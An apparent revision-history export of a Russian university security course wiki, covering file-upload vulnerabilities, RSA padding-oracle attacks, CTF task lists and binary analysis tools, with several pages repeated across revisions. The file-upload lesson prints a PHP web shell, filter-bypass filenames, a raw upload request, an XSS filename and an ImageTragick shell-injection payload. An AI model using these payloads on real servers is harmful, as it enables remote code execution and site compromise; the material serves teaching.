$sql = 'INSERT INTO cities SET name = "Санкт-Петербург"';
$result = mysqli_query($link, $sql);

if ($result == false) {
print("Произошла ошибка при выполнении запроса");
}
</syntaxhighlight>

=web shell=

Простейшим примером является загрузка файла с расширением .php на сайт, работающий на PHP (в качестве проверки можно попробовать обратиться по адресу '''cite.com/index.php''' и не получить ошибки). По умолчанию PHP-сайты работают так что пользователь обращается по URL к файлу (URL сайта, начиная с первого /, отображаются на определенную директорию на сервере, она называется '''web root''') и, если этот файл имеет расширение php (или другое расширение из предопределенного списка расширений для PHP-файлов), то содержимое этого файла выполняется как код на PHP, вывод этого кода возвращается пользователю в ответе (кстати, так работает не только PHP, но и ASP.NET Web Forms, JSP, ASP). В результате, если пользователь может загрузить на сайт файл c расширением .php и обратиться к нему по URL (т. е. этот файл будет создан где-то внутри '''web root'''), то, если сервер специально не настроен чтобы файлы из директории для загрузок не выполнялись, PHP-код в нём будет выполнен. Соответственно, загрузив на уязвимый сайт файл <code>shell.php</code> с кодом
<pre>
42 * 66613;
<?php system('ls -lsa'); ?>
</pre>
и, получив ссылку на него (к примеру, /uploads/5c8e82bb8ad66/attack.php), обратится по ней, то в результате этот PHP-код выполнится и в ответе сервера будет
произведение чисел 42 и 66613, а также список всех файлов в длинном формате (функция PHP system работает так же как одноимённая функция библиотеки Си - то есть выполняет команду shell). В итоге атакующий получает выполнение произвольного кода на сервере (RCE).

=Обход методов защиты и атака=

==Валидация имени файла==

===Черный список ресширений===
Обходится с помощью использования двойных расширений (<code>shell.php.png</code>) или малоизвестный расширений (<code>.php5</code>, <code>.phtml</code>, <code>.shtml</code>, <code>.htaccess</code>). Кроме того, возможна инъекция нулевого байта (<code>shell.php%00.jpg</code>) или регистрозависимость при проверке (<code>PHp3</code>, <code>.aSp</code>).

===Белый список расширений===
Спасает от использования атакующим малоизвестных и регистрозависимых расширений, но все ещё обходится с помощью двойных расширений или инъекции нулевого байта.

===Санитайзеры===
Оставляет большую степень свободы. Например, если санитайзер удаляет вхождения подстрок типа <code>.php</code>, то использования имени файла вида <code>shell.p'''.php'''hp</code> позволяет после загрузки получить файл с именем <code>shell.php</code>.

==Валидация Content-Type==
Обходится изменением заголовка Content-Type, например, с помощью перехватывающего прокси (burp suite). Соответсвенно, в запросе
<pre>
POST / HTTP/1.1
Host: easy.fu.khashaev.ru
Content-Length: 200
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="info.php"
Content-Type: text/php
<?php phpinfo(); ?>
------WebKitFormBoundary--
</pre>
строчка <code>Content-Type: text/php</code> может быть заменена на строчку <code>Content-Type: image/png</code>.

==Прочее==
'''.htaccess''' - конфигурационный файл веб-сервера Apache, позволяющий управлять работой веб-сервера и настройками сайта с помощью различных параметров (директив) без изменения основного конфигурационного файла веб-сервера.

'''Server Side Includes''' - язык для динамической «сборки» веб-страниц на сервере из отдельных составных частей и выдачи клиенту полученного HTML-документа. Имеет расширения .shtml, .stm или .shtm. Например, при загрузке и вызове '''file.shtml''', содержащего код
<pre></pre>
атакующему будет выведен список файлов данной директории.

'''Static HTML'''

При возможности загрузить на сервис статический HTML, создается HTML-страница, содержащая вредоносный код (например, крадущего cookie), и ссылка на этот файл отправляется жертве.

'''Path Traversal'''

Атака, основанная на использовании специфически составленных имен файлов (например, <code>../config.ini</code>), позволяющих выйти за пределы директории хранения файлов. Может привести к переписыванию исходных фалов веб-приложения, конфигурационных или системных файлов.
Атака возможна, если не используется функция <code>basename</code> (возвращает последний компонент имени из указанного пути) или её аналог.

'''Filename XSS'''

Сервис уязвим к XSS, если допускается имя файла вида <code><script>alert(1)</script></code>.

==Полиглоты==
Полиглотами называют файлы, которые могут быть корректно распознаны как файлы разных типов.
Можно встраивать
* JavaScript в JPEG, GIF, PNG, PDF
* HTML в что-нибудь
* PHP в [https://rdot.org/forum/showthread.php?t=2780 JPEG ], [https://github.com/fakhrizulkifli/Defeating-PHP-GD-imagecreatefromgif GIF], [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ PNG]

===Структура JPEG===
Все jpeg-файлы имеют схожую структуру. Рассмотрим в качестве примера изображение

[[Файл:Mini.jpg|128px]]

В hex-редакторе оно выглядит следующим образом

[[Файл:Hex_print.png]]

В структуре jpeg-файлов содержатся служебные маркеры, состоящие из двух байт и всегда начинающиеся с FF.

* '''FF D8''' - маркер начала jpeg-файла;
* '''FF DA''' - маркер начала секции Start of Scan:
** в двух байтах хранится длинна заголовка изображения [00 0C];
** заголовок изображения [03 01 00 02 11 03 11 00 3F 00];
** непосредственно информацию о самом изображении;
* '''FF D9''' - маркер конца jpeg-файла.

=Image Magic=
'''ImageMagick''' — набор программ для чтения и редактирования файлов множества графических форматов, свободное и кроссплатформенное ПО. Может использоваться с языками Perl, C, C++, Python, Ruby, PHP, Node.js, Pascal, Java, Delphi, в скриптах командной оболочки или самостоятельно.
ImageMagick обладает широким набором возможностей (конвертация, маскирование, увеличение контрастности и т.п.) и поддерживает работу с различными типами файлов, но так же в нем находили различные уязвимости:
* RCE [CVE-2016-3714]
* SSRF [CVE-2016-3718]
* File deletion [CVE-2016-3715]
* File moving [CVE-2016-3716]
* Local File Read [CVE-2016-3717]
CVE - Common Vulnerabilities and Exposures - база данных общеизвестных уязвимостей информационной безопасности.

Был создан сайт [https://imagetragick.com/ ImageTragick], посвященный описанию некоторых уязвимостей ImageMagic.

'''Пример.'''

Допустим, что есть некоторый онлайн-сервис, позволяющих переводить файлы в разные форматы, использующий библиотеку ImageMagic.
Тогда, создав файл exploit.mvg с содержанием
<pre>
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/
image.jpg " ; | ls "-la)'
pop graphic-context
</pre>
и выполнив запрос на преобразование файла, аналогичный команде
<pre>$ convert exploit.mvg out.png</pre>
атакующий получит список всех файлов директории.

=Задания=
* http://easy.stands.cyberschool.msu.ru/
* http://type.stands.cyberschool.msu.ru/
* http://hand.stands.cyberschool.msu.ru

=Ссылки=
* [https://drive.google.com/file/d/1Jep20CuBfcfKAeStwnHgR0gCf-O2Wgd0/view?usp=sharing Презинтация]
* [https://www.php.net/ https://www.php.net/] - сайт PHP
* [https://htmlacademy.ru/tutorial/php https://htmlacademy.ru/tutorial/php] - учебник PHP
* [http://www.php.su/php/?php http://www.php.su/php/?php] - ещё один учебник
* [https://www.alchemistowl.org/pocorgtfo/pocorgtfo15.pdf Полиглоты]
* [https://drive.google.com/file/d/1Rz0RP5tKIWCmFDP3-_--VYu40ejWf48v/view?usp=sharing Валидация структурных типов]

Практикум на ЭВМ (2021)

2021-10-07T07:42:06Z

Romankholin94: /* Веб */

Курсы 2021

2021-09-08T11:46:21Z

Romankholin94: /* > Практикум */

== [[Практикум_на_ЭВМ_(2021)|> Практикум]] ==

== [[Дополнительные_главы_практической_безопасности_(2021)|> Дополнительные главы практической безопасности]] ==

Практикум на ЭВМ (2021)

2021-09-08T11:46:06Z

Romankholin94: /* Задания */

Практикум на ЭВМ (2021)

2021-09-08T11:45:40Z

Romankholin94: Новая страница: «__NOTOC__ '''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуаль…»

Практикум на ЭВМ (2020)

2021-04-07T11:01:46Z

Romankholin94: /* Криптография и криптоанализ */

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по четвергам, 12:50
* '''Где''': аудитория 612

Практикум связан с курсом "Безопасность компьютерных систем", который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара - т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2020/2021 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"
Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса main__

Флаги нужно сдавать в [https://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===

* <s>[[Практикум_на_ЭВМ_(2020)/Бонусное_задание|Бонусное задание]]</s>

* <s>http://club.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 01.12.2020 1:53)
* <s>http://jpg.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 01.12.2020 1:53)
* <s>http://hard.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 01.12.2020 1:53)
* <s>http://bank.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 10.12.2020 1:53)
* <s>http://corporate.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 10.12.2020 1:53)
* <s>http://pwnitter.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 10.12.2020 1:53)
* <s>http://seeker.shanton.ru:8081</s>, дамп контейнера - https://yadi.sk/d/BV0UynXuOJmnBg (deadline - 23.12.2020 1:53)
* <s>http://shop.tasks.prak.seclab.cs.msu.ru</s> (deadline - 23.12.2020 1:53)
* <s>http://tiny.dong.solutions:28080</s> (нужно использовать droog@tiny.dong.solutions) (deadline - 23.12.2020 1:53)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* <s>[https://drive.google.com/file/d/1ENAVVDKlKIGgELZh6sCaP1wJ4SiOAYwz/view?usp=sharing task 5]</s> nc tasks.prak.seclab.cs.msu.ru 16965 (deadline 21.12.2020 0:00)
* <s>[https://drive.google.com/file/d/1ZImdhu0o6KHdCoz6O8n2CD2FWa2Wk0js/view?usp=sharing task 6]</s> nc tasks.prak.seclab.cs.msu.ru 16966 (deadline 21.12.2020 0:00)
* <s>[https://drive.google.com/file/d/1R55Q3Czxd4Wu_hVP1lAK2vSkJcxmh9wg/view?usp=sharing task 7]</s> nc tasks.prak.seclab.cs.msu.ru 16967 (deadline 21.12.2020 0:00)

=== Криптография и криптоанализ ===

* RSA: <s>[https://khashaev.ru/secsem/rsa/#broadcast broadcast]</s>, <s>[https://khashaev.ru/secsem/rsa/#common-sense common-sense]</s> (deadline - 29.03.2021 1:53)
* [[Практикум_на_ЭВМ_(2020)/Задание_на_блочные_шифры|Задание на блочные шифры]] (deadline - 16.04.2021 1:53)
* [[Практикум_на_ЭВМ_(2020)/Задание_на_padding_oracle|Задание на padding oracle]] (deadline - 21.04.2021 14:00)

=== Сетевая безопасность ===

=== Мобильные приложения ===

Обход проверки root-доступа [[Root_check_bypass]]

== Материалы ==

=== Веб ===

Семинар 1 (17 сентября 2020) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (24 сентября 2020) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (1 октября 2020) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (8 октября 2020) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (15 октября 2020) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (22 октября 2020) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (29 октября 2020) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (5 ноября 2020) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

Семинар 9 (12 ноября 2020) [[Бинарные_уязвимости/Stack_overflow]]

Семинар 10 (19 ноября 2020) [[Бинарные_уязвимости/Off-by-one]]

Семинар 11 (26 ноября 2020) [[Бинарные_уязвимости/House-of-force]]

Семинар 12 (3 декабря 2020) [[Бинарные_уязвимости/cve-2019-5782]]

=== Уязвимости мобильных приложений ===

Семинар 14 (10 декабря 2020) [[Уязвимости_мобильных_приложений/1]]

Семинар 15 (17 декабря 2020) [[Уязвимости_мобильных_приложений/2]]

=== Криптография и криптоанализ ===
Семинар 1 (15 февраля 2021) [[Введение в практическую безопасность (2019)/Асимметричная криптография на примере RSA]]

Семинар 2 (1 марта 2021) [[Криптография/Блочные шифры. Атаки на блочные шифры]]

Семинар 3 (15 марта 2021) [[Криптография/Атака Padding oracle на RSA]]

=== Сетевая безопасность ===

== Примечания ==
<references/>

Практикум на ЭВМ (2020)/Задание на padding oracle

2021-04-07T11:01:39Z

Romankholin94: Новая страница: «Есть сервис для заказа товаров. Вы хотите расшифровать чужой заказ. Получить чужой заказ…»

Есть сервис для заказа товаров. Вы хотите расшифровать чужой заказ. Получить чужой заказ в зашифрованном виде:

http://bleichenbacher.tasks.prak.seclab.cs.msu.ru:8082/api/order/rival/

Вы также можете сделать заказ. Для этого нужно:

получить публичный ключ:

http://bleichenbacher.tasks.prak.seclab.cs.msu.ru:8082/api/pubkey/

сделать заказ - отправить следующий post-запрос:

url: http://bleichenbacher.tasks.prak.seclab.cs.msu.ru:8082/api/order/place/,

data: {“order”: <ваш_заказ_в_зашифрованном_виде>}

headers: {'content-type': 'application/json'}

Криптография/Атака Padding oracle на RSA

2021-04-02T14:00:01Z

Romankholin94: /* PKCS#1 v1.5 */

==Мультипликативное свойство RSA==
Пусть E(M) - функция шифрования, N - модуль, X mod Y - остаток от деления X на Y. Тогда:
<pre> E(M1)E(M2) mod N = E(M1M2 mod N)</pre>
Данной свойство очевидно выводится из определения функции шифрования E(M).

==Pairing Oracle==
Разберем следующи пример: пусть есть сервис по заказу яиц. Но он позваляет заказывать только четное количество яиц. Заказы принимаются в зашифрованном RSA виде. Нужно, имея подслушанный зашифрованный текст C, получить его дешифрованный текст M.

Атака выглядит следующим образом: пусть M < N. Можно послать сервису заказ на <code>2M mod N</code> яиц (для этого нужно послать <code>(C*2^e) mod N)</code>. Тогда есть два варинта:
# <code>M > N/2</code>, тогда <code>2M mod N = 2M - N</code> - нечетное число, сервис не принимает заказ
# <code>M <= N/2</code>, тогда <code>2M mod N = 2M</code> - четное число, сервис принимает заказ
Аналогичные суждения можно сделать, домножая C на 2^ie mod N (где i - натуральное число) и, используя метод двоичного поиска, выяснить, чему же равно M.

==PKCS==
Согласно этому стандарту, паддинг текста, длина которого недостаточна для шифрования происходит следующим образом:
<span style="color:#B22222">0002</span><span style="color:#4169E1">3572e4bcc8df4c7e53f931c1d79addcc3d0412db8723e28c84a5f6340d0f95f9836b07907669f2527
eda22e1f80e6e2e4dac062326f5716fca45</span><span style="color:#FF00FF">00</span>4c65616b696e672070617269747920616c6c6f777320666f7
22064656372797074696e6720612077686f6c652052534120656e63727970746564206d6573736167650a

<span style="color:#B22222">0002</span> - первые два байта определяют тип падинга

<span style="color:#4169E1">3572e4bcc8df4c7e53f931c1d79addcc3d0412db8723e28c84a5f6340d
0f95f9836b07907669f2527eda22e1f80e6e2e4dac062326f5716fca45</span> - ненулевые случайные байты

<span style="color:#FF00FF">00</span> - сепаратор, после которого идёт собственно сам текст

==Атака Блехенбахера==
[https://disk.yandex.ru/i/-_ohdI9lqwgqyg| Ссылка на описание атаки]

==Ссылки==
* [https://youtu.be/J8j2LHiKS0I Видео лекции]
* [https://docs.google.com/presentation/d/19sGLccnP5IcVm3l3ie3UJZ_nMTxu62SMCFHCd_M2fFc/edit?usp=sharing Презинтация лекции]
* [http://archiv.infsec.ethz.ch/education/fs08/secsem/bleichenbacher98.pdf Оригинал статьи по атаке Блехенбахера]
* [http://secgroup.dais.unive.it/wp-content/uploads/2012/11/Practical-Padding-Oracle-Attacks-on-RSA.html Ещё одна статья про padding oracle]

Криптография/Атака Padding oracle на RSA

2021-04-02T13:59:26Z

Romankholin94: /* Pairing Oracle */

==Мультипликативное свойство RSA==
Пусть E(M) - функция шифрования, N - модуль, X mod Y - остаток от деления X на Y. Тогда:
<pre> E(M1)E(M2) mod N = E(M1M2 mod N)</pre>
Данной свойство очевидно выводится из определения функции шифрования E(M).

==Pairing Oracle==
Разберем следующи пример: пусть есть сервис по заказу яиц. Но он позваляет заказывать только четное количество яиц. Заказы принимаются в зашифрованном RSA виде. Нужно, имея подслушанный зашифрованный текст C, получить его дешифрованный текст M.

Атака выглядит следующим образом: пусть M < N. Можно послать сервису заказ на <code>2M mod N</code> яиц (для этого нужно послать <code>(C*2^e) mod N)</code>. Тогда есть два варинта:
# <code>M > N/2</code>, тогда <code>2M mod N = 2M - N</code> - нечетное число, сервис не принимает заказ
# <code>M <= N/2</code>, тогда <code>2M mod N = 2M</code> - четное число, сервис принимает заказ
Аналогичные суждения можно сделать, домножая C на 2^ie mod N (где i - натуральное число) и, используя метод двоичного поиска, выяснить, чему же равно M.

==PKCS#1 v1.5==
Согласно этому стандарту, паддинг текста, длина которого недостаточна для шифрования происходит следующим образом:
<span style="color:#B22222">0002</span><span style="color:#4169E1">3572e4bcc8df4c7e53f931c1d79addcc3d0412db8723e28c84a5f6340d0f95f9836b07907669f2527
eda22e1f80e6e2e4dac062326f5716fca45</span><span style="color:#FF00FF">00</span>4c65616b696e672070617269747920616c6c6f777320666f7
22064656372797074696e6720612077686f6c652052534120656e63727970746564206d6573736167650a

<span style="color:#B22222">0002</span> - первые два байта определяют тип падинга

<span style="color:#4169E1">3572e4bcc8df4c7e53f931c1d79addcc3d0412db8723e28c84a5f6340d
0f95f9836b07907669f2527eda22e1f80e6e2e4dac062326f5716fca45</span> - ненулевые случайные байты

<span style="color:#FF00FF">00</span> - сепаратор, после которого идёт собственно сам текст

==Атака Блехенбахера==
[https://disk.yandex.ru/i/-_ohdI9lqwgqyg| Ссылка на описание атаки]

==Ссылки==
* [https://youtu.be/J8j2LHiKS0I Видео лекции]
* [https://docs.google.com/presentation/d/19sGLccnP5IcVm3l3ie3UJZ_nMTxu62SMCFHCd_M2fFc/edit?usp=sharing Презинтация лекции]
* [http://archiv.infsec.ethz.ch/education/fs08/secsem/bleichenbacher98.pdf Оригинал статьи по атаке Блехенбахера]
* [http://secgroup.dais.unive.it/wp-content/uploads/2012/11/Practical-Padding-Oracle-Attacks-on-RSA.html Ещё одна статья про padding oracle]

Практикум на ЭВМ (2020)

2021-03-31T20:27:56Z

Romankholin94: /* Криптография и криптоанализ */

__NOTOC__
'''Практикум на ЭВМ''' кафедры ИБ ВМК МГУ ведут сотрудники лаборатории интеллектуальных систем кибербезопасности для групп 319/1 и 319/2.

* '''Когда''': по четвергам, 12:50
* '''Где''': аудитория 612

Практикум связан с курсом "Безопасность компьютерных систем", который читается для группы 319/2, и содержит практические задания по темам курса. Каждое занятие практикума имеет формат воркшопа/семинара - т.е. занятие будет практическим, на него надо приходить с ноутбуком, а также установленным софтом. Набор нужного для занятия софта объявляется отдельно перед занятием.

Основные темы, которые будут затронуты в практикуме 2020/2021 учебного года:
* веб-безопасность
* реверс-инжиниринг и эксплуатация бинарных программ
* криптография
* сетевая безопасность

Оценка за практикум будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные, баллы за все обязательные задания одной темы будут в сумме давать '''1000''', таким образом, баллы за все обязательные задания одного семестра вместе дадут '''2000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"
Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Задания ==

Задания выполнены в формате task-based CTF: в каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему, для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса main__

Флаги нужно сдавать в [https://dashboard.prak.seclab.cs.msu.ru/ принимающую систему]. В ней нужно заранее зарегистрироваться (ник в формате ''Фамилия Имя'') и дождаться активации, без этого сдавать флаги не получится Флаги время от времени меняются, если вы получили флаг, но он не сдается, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

=== Веб ===

* <s>[[Практикум_на_ЭВМ_(2020)/Бонусное_задание|Бонусное задание]]</s>

* <s>http://club.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 01.12.2020 1:53)
* <s>http://jpg.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 01.12.2020 1:53)
* <s>http://hard.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 01.12.2020 1:53)
* <s>http://bank.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 10.12.2020 1:53)
* <s>http://corporate.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 10.12.2020 1:53)
* <s>http://pwnitter.tasks.prak.seclab.cs.msu.ru/</s> (deadline - 10.12.2020 1:53)
* <s>http://seeker.shanton.ru:8081</s>, дамп контейнера - https://yadi.sk/d/BV0UynXuOJmnBg (deadline - 23.12.2020 1:53)
* <s>http://shop.tasks.prak.seclab.cs.msu.ru</s> (deadline - 23.12.2020 1:53)
* <s>http://tiny.dong.solutions:28080</s> (нужно использовать droog@tiny.dong.solutions) (deadline - 23.12.2020 1:53)

=== Реверс-инжиниринг и бинарная эксплуатация ===

* <s>[https://drive.google.com/file/d/1ENAVVDKlKIGgELZh6sCaP1wJ4SiOAYwz/view?usp=sharing task 5]</s> nc tasks.prak.seclab.cs.msu.ru 16965 (deadline 21.12.2020 0:00)
* <s>[https://drive.google.com/file/d/1ZImdhu0o6KHdCoz6O8n2CD2FWa2Wk0js/view?usp=sharing task 6]</s> nc tasks.prak.seclab.cs.msu.ru 16966 (deadline 21.12.2020 0:00)
* <s>[https://drive.google.com/file/d/1R55Q3Czxd4Wu_hVP1lAK2vSkJcxmh9wg/view?usp=sharing task 7]</s> nc tasks.prak.seclab.cs.msu.ru 16967 (deadline 21.12.2020 0:00)

=== Криптография и криптоанализ ===

* RSA: [https://khashaev.ru/secsem/rsa/#broadcast broadcast], [https://khashaev.ru/secsem/rsa/#common-sense common-sense] (deadline - 29.03.2021 1:53)
* [[Практикум_на_ЭВМ_(2020)/Задание_на_блочные_шифры|Задание на блочные шифры]] (deadline - 07.04.2021 1:53)

=== Сетевая безопасность ===

=== Мобильные приложения ===

Обход проверки root-доступа [[Root_check_bypass]]

== Материалы ==

=== Веб ===

Семинар 1 (17 сентября 2020) [[Веб-безопасность/Введение в веб-технологии]]

Семинар 2 (24 сентября 2020) [[Веб-безопасность/Базы_данных_SQL]]

Семинар 3 (1 октября 2020) [[Веб-безопасность/Уязвимости_SQLi]]

Семинар 4 (8 октября 2020) [[Веб-безопасность/Уязвимости_XSS]]

Семинар 5 (15 октября 2020) [[Веб-безопасность/Уязвимости_FileUpload]]

Семинар 6 (22 октября 2020) [[Веб-безопасность/Атаки_SSRF]]

Семинар 7 (29 октября 2020) [[Веб-безопасность/Уязвимости_XXE]]

=== Реверс-инжиниринг и бинарная эксплуатация ===

Семинар 8 (5 ноября 2020) [[Бинарные_уязвимости/Инструменты_поиска_бинарных_уязвимостей]]

Семинар 9 (12 ноября 2020) [[Бинарные_уязвимости/Stack_overflow]]

Семинар 10 (19 ноября 2020) [[Бинарные_уязвимости/Off-by-one]]

Семинар 11 (26 ноября 2020) [[Бинарные_уязвимости/House-of-force]]

Семинар 12 (3 декабря 2020) [[Бинарные_уязвимости/cve-2019-5782]]

=== Уязвимости мобильных приложений ===

Семинар 14 (10 декабря 2020) [[Уязвимости_мобильных_приложений/1]]

Семинар 15 (17 декабря 2020) [[Уязвимости_мобильных_приложений/2]]

=== Криптография и криптоанализ ===
Семинар 1 (15 февраля 2021) [[Введение в практическую безопасность (2019)/Асимметричная криптография на примере RSA]]

Семинар 2 (1 марта 2021) [[Криптография/Блочные шифры. Атаки на блочные шифры]]

Семинар 3 (15 марта 2021) [[Криптография/Атака Padding oracle на RSA]]

=== Сетевая безопасность ===

== Примечания ==
<references/>

Криптография/Атака Padding oracle на RSA

2021-03-31T20:27:22Z

Romankholin94: Новая страница: «==Мультипликативное свойство RSA== Пусть E(M) - функция шифрования, N - модуль, X mod Y - остаток от…»

==Мультипликативное свойство RSA==
Пусть E(M) - функция шифрования, N - модуль, X mod Y - остаток от деления X на Y. Тогда:
<pre> E(M1)E(M2) mod N = E(M1M2 mod N)</pre>
Данной свойство очевидно выводится из определения функции шифрования E(M).

==Pairing Oracle==
Разберем следующи пример: пусть есть сервис по заказу яиц. Но он позваляет заказывать только четное количество яиц. Заказы принимаются в зашифрованном RSA виде. Нужно, имея подлушанный зашифрованный текст C, получить его дешифрованный текст M.

Атака выглядит следующим образом: пусть M < N. Можно послать сервису заказ на <code>2M mod N</code> яиц (для этого нужно послать <code>(C*2^e) mod N)</code>. Тогда есть два варинта:
# <code>M > N/2</code>, тогда <code>2M mod N = 2M - N</code> - нечетное число, сервис не принимает заказ
# <code>M <= N/2</code>, тогда <code>2M mod N = 2M</code> - четное число, сервис принимает заказ
Аналогичные суждения можно сделать, домножая C на 2^ie mod N (где i - натуральное число) и, используя метод двоичного поиска, выяснить, чему же равно M.

==PKCS#1 v1.5==
Согласно этому стандарту, паддинг текста, длина которого недостаточна для шифрования происходит следующим образом:
<span style="color:#B22222">0002</span><span style="color:#4169E1">3572e4bcc8df4c7e53f931c1d79addcc3d0412db8723e28c84a5f6340d0f95f9836b07907669f2527
eda22e1f80e6e2e4dac062326f5716fca45</span><span style="color:#FF00FF">00</span>4c65616b696e672070617269747920616c6c6f777320666f7
22064656372797074696e6720612077686f6c652052534120656e63727970746564206d6573736167650a

<span style="color:#B22222">0002</span> - первые два байта определяют тип падинга

<span style="color:#4169E1">3572e4bcc8df4c7e53f931c1d79addcc3d0412db8723e28c84a5f6340d
0f95f9836b07907669f2527eda22e1f80e6e2e4dac062326f5716fca45</span> - ненулевые случайные байты

<span style="color:#FF00FF">00</span> - сепаратор, после которого идёт собственно сам текст

==Атака Блехенбахера==
[https://disk.yandex.ru/i/-_ohdI9lqwgqyg| Ссылка на описание атаки]

==Ссылки==
* [https://youtu.be/J8j2LHiKS0I Видео лекции]
* [https://docs.google.com/presentation/d/19sGLccnP5IcVm3l3ie3UJZ_nMTxu62SMCFHCd_M2fFc/edit?usp=sharing Презинтация лекции]
* [http://archiv.infsec.ethz.ch/education/fs08/secsem/bleichenbacher98.pdf Оригинал статьи по атаке Блехенбахера]
* [http://secgroup.dais.unive.it/wp-content/uploads/2012/11/Practical-Padding-Oracle-Attacks-on-RSA.html Ещё одна статья про padding oracle]

Практикум на ЭВМ (2020)

2020-11-09T14:47:55Z

Romankholin94: /* Веб */

Бинарные уязвимости/Инструменты поиска бинарных уязвимостей

2020-11-09T14:47:49Z

Romankholin94: Новая страница: «== strings == Выводит константные строки, которые есть в бинарнике. Строки определяются эврис…»

== strings ==

Выводит константные строки, которые есть в бинарнике. Строки определяются эвристикой, поэтому часто бывают ложные срабатывания. IDA тоже умеет определять строки.

<pre>
$ strings reverse_example_1
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
MD5_Final
MD5_Init
MD5_Update
libc.so.6
fopen
__stack_chk_fail
fgets
malloc
stderr
fwrite
__sprintf_chk
__libc_start_main
free
GLIBC_2.3.4
GLIBC_2.4
GLIBC_2.2.5
OPENSSL_1.0.0
D$(1
T$(dH3
AUATH
D$h1
|$hdH3<%(
x[]A\A]
AWAVA
AUATL
[]A\A]A^A_
%02X
./cd-key.txt
failed to open CD key file
failed to read CD key file
invalid cdkey
Good job!
;*3$"
.shstrtab
.interp
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
</pre>

== strace ==

Выводит трассу системных вызовов. Полезно, чтобы определить, какие файлы читает программа, и как вообще взаимодействует с внешним миром (в том числе сеть).

<pre>
$ strace ./reverse_example_1
...
openat(AT_FDCWD, "./cd-key.txt", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=24, ...}) = 0
read(3, "AAAAA-BBBBB-CCCCC-DDDDD\n", 4096) = 24
write(2, "invalid cdkey\n", 14) = 14
exit_group(1) = ?
</pre>

== IDA Pro ==

Интерактивный дизассемблер и декомпилятор.

=== Шорткаты ===
<center style="font-size: 500%">
{{клавиша|F5}}
